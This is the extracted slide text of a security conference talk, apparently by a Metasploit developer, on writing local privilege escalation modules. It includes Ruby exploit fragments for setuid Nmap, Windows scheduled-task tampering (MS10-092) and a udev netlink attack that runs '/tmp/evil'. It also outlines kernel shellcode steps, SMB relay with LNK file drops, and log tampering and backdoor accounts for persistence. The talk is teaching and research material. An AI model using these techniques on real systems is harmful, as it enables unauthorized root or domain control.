This document summarizes techniques for privilege escalation using the Metasploit framework. It begins by explaining why Metasploit is useful and why privilege escalation is important for gaining more access and control. It then provides examples of how to write Metasploit modules for local privilege escalation exploits, including generating payloads, including the necessary Metasploit mixins, and interacting with sessions post-exploitation. Specific local privilege escalation techniques demonstrated include exploiting vulnerable setuid binaries like Nmap, modifying Windows scheduled tasks, and relaying Windows authentication. The document concludes by discussing future work to improve Metasploit module development.

1. PRIVILEGE ESCALATION WITH THE
METASPLOIT FRAMEWORK
For when you absolutely, positively,
have to have root (and don't mind
the occasional kernel panic).

2. egypt

6. WHY METASPLOIT?

8. LARGE OPEN SOURCE COMMUNITY

9. > C

10. WHY PRIVILEGE ESCALATION?

13. HIGH IS BETTER THAN LOW
Persistence
• Backdoor login facilities, add users
Stealth
• Modify logs to conceal presence
• More options for hiding files/processes
Various nefarious activity
• Inject into other users' processes
• Capture packets

14. CONTRIVED EXAMPLE
int
main(int argc, char* argv[]){
setuid(0); setgid(0);
execv("/bin/sh",argv);
return 0;
}

16. MSF::EXPLOIT::LOCAL
• Inherit from Exploit
– Provides payloads and handlers
• Include Exploit mixins
– Most useful right now is Exploit::EXE
• Include Post mixins
– Provides session interaction
– Write files, manipulate registry, etc

17. CONTRIVED EXPLOIT (1/2)
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
...
'Platform' => 'linux',
'Arch' => ARCH_X86,
...

18. CONTRIVED EXPLOIT (2/2)
def exploit
elf = generate_payload_exe
write_file("./foo", elf)
cmd_exec("chmod +x ./foo")
cmd_exec("/tmp/sh –c ./foo &")
end

20. REAL-WORLD* EXAMPLE -- NMAP
• Nmap is a security tool
• It needs root for some things
• Sometimes admins chmod +s it for
convenience
* This is not a default configuration and the
Nmap man page tells you it's stupid

21. NMAP SCRIPTING ENGINE
• Scan stuff with LUA
• Very powerful
• Fast and easy to write (compared to C++ for
hacking on Nmap itself)

22. NSE-FLAVORED LUA
• Has a specific structure
• API expects you to have an action function
and several fields
– Complains if they aren't there

23. SETUID NMAP EXPLOIT
def exploit
cmd = payload.encoded
write_file("./f.nse",
%Q^os.execute("#{cmd}")^
)
...
cmd_exec(
"nmap -p1 ::1 --script ./f.nse"
)
end

24. DEMO: MULTI/LOCAL/SETUID_NMAP
"Nmap should never be installed with
special privileges (e.g. suid root) for
security reasons."

27. MS10_092_SCHELEVATOR
• Stuxnet 0day
• Schtasks stores tasks as XML files
– Readable/Writable by user that created task
• Uses CRC32 to verify integrity

28. CREATE A TASK…
cmdline = "schtasks.exe /create
/tn #{taskname} /tr "#{cmd}"
/sc monthly /f"
...

29. MODIFY IT TO RUN AS SYSTEM…
content.gsub!(
'LeastPrivilege',
'HighestAvailable'
)
content.gsub!(
/<UserId>.*</UserId>/,
'<UserId>S-1-5-18</UserId>'
)

30. FIND A CRC COLLISION

32. > C

33. < C
Except when…

34. COMPILING/ASSEMBLING WITH METASM
• Can compile C for x86/x86_64
• Assemble x86, x64, mips, arm, ppc and more
• Executables or shared objects

35. COMPILED C DEV PROCESS*
• Develop on a system with headers
• "Factorize" structs, #defines, etc
– There are gotchas with this
• Builds dynamic executables
[*] Subject to change without notice

36. LINUX/LOCAL/UDEV_NETLINK
• UDEV gets events from the kernel
• On multicast netlink sockets
– Which can only be sent by root
• Doesn't mind getting unicast
– Which can be sent by unpriv users

37. 95-UDEV-LATE.RULES
ACTION=="remove",
ENV{REMOVE_CMD}!="",
RUN+="$env{REMOVE_CMD}"

38. THE EXPLOIT
remove@/d
SUBSYSTEM=block
DEVPATH=/dev/foo
TIMEOUT=10
REMOVE_CMD=/tmp/evil

39. cparser.parse(main, "main.c")
c=cpu.new_ccompiler(cparser,sc)
sc.parse(c.compile)
sc.assemble
elf = sc.encode_string
write_file("/tmp/evil", elf)
cmd_exec("chmod +x /tmp/evil")
cmd_exec("/tmp/evil &")

40. LINUX/LOCAL/SOCK_SENDPAGE
• NULL dereference in proto_ops
• Linux allows userspace to mmap(NULL, …)
• shellcode at NULL + bug == ring0 code exec

41. RING 0 SHELLCODE <2.6.29
• Find task struct
– 4k or 8k stacks?
• Change uid/gid to 0
• Change CAPS bits to all 1s

42. RING 0 SHELLCODE >= 2.6.29
• Find prepare_kernel_cred function
• Find commit_creds function
• Call them

43. DEMO: LINUX/LOCAL/SOCK_SENDPAGE
AKA Wunderbar Emporium

46. LEFTOVER JUNK FROM DEFCON

47. SMB RELAY
Victim
Attacker Target
Victim begins NTLM
authentication against the
attacker

48. SMB RELAY
Victim
Attacker Target
Attacker begins NTLM auth
against Target

49. SMB RELAY
Victim
Attacker Target
Target replies with 8-byte
challenge

50. SMB RELAY
Victim
Attacker Target
Attacker sends Target's
challenge to Victim

51. SMB RELAY
Victim
Attacker Target
Victim calculates challenge
response and replies with
final authentication packet

52. SMB RELAY
Victim
Attacker Target
Attacker logs into Target
with Victim's credentials

53. SMB RELAY
• Well-known attack
• Some mitigations break it, but largely still
useful and will be for a long time

54. Drop LNK file (post/windows/escalate/droplnk)
Setup a relay (exploit/windows/smb/smb_relay)
Wait for an Admin to open
that directory
File Server
Compromised
Attacker
Target
Create LNK file
Victim
SMB RELAY + LNK FILE

55. AUTOMATIC DOMAIN AUTH
• Windows stores creds in memory and does
NTLM auth using your current token
• When you do something in the GUI that
requires auth, it happens transparently using
those creds
• If your user has Local Admin on another box,
you can create/start services (usually)

56. SC_HANDLE WINAPI OpenSCManager(
__in_opt LPCTSTR lpMachineName,
__in_opt LPCTSTR lpDatabaseName,
__in DWORD dwDesiredAccess );

57. SC_HANDLE WINAPI CreateService(
__in SC_HANDLE hSCManager,
__in LPCTSTR lpServiceName,
__in_opt LPCTSTR lpDisplayName,
__in DWORD dwDesiredAccess,
__in DWORD dwServiceType,
__in DWORD dwStartType,
__in DWORD dwErrorControl,
__in_opt LPCTSTR lpBinaryPathName,
__in_opt LPCTSTR lpLoadOrderGroup,
__out_opt LPDWORD lpdwTagId,
__in_opt LPCTSTR lpDependencies,
__in_opt LPCTSTR lpServiceStartName,
__in_opt LPCTSTR lpPassword );

58. DEMO: OWNING DC USING DA TOKEN
Yay automatic authentication

60. FUTURE WORK
1. Compile to shellcode
2. Upload in memory
3. Fork (prevents parent session crash)
4. Child jumps to shellcode
5. Do the root dance

61. FUTURE WORK
• Port all the stuff in post/*/escalate/ to
Exploit::Local
• Pull more code up into mixins

62. CONCLUSIONS
• Shells are awesome
• Root shells are better
• Metasploit is awesomesauce
• If it doesn't already do what you need, it's
easy to add new modules

63. • Twitter: @egyp7
• IRC: #metasploit on FreeNode
QUESTIONS?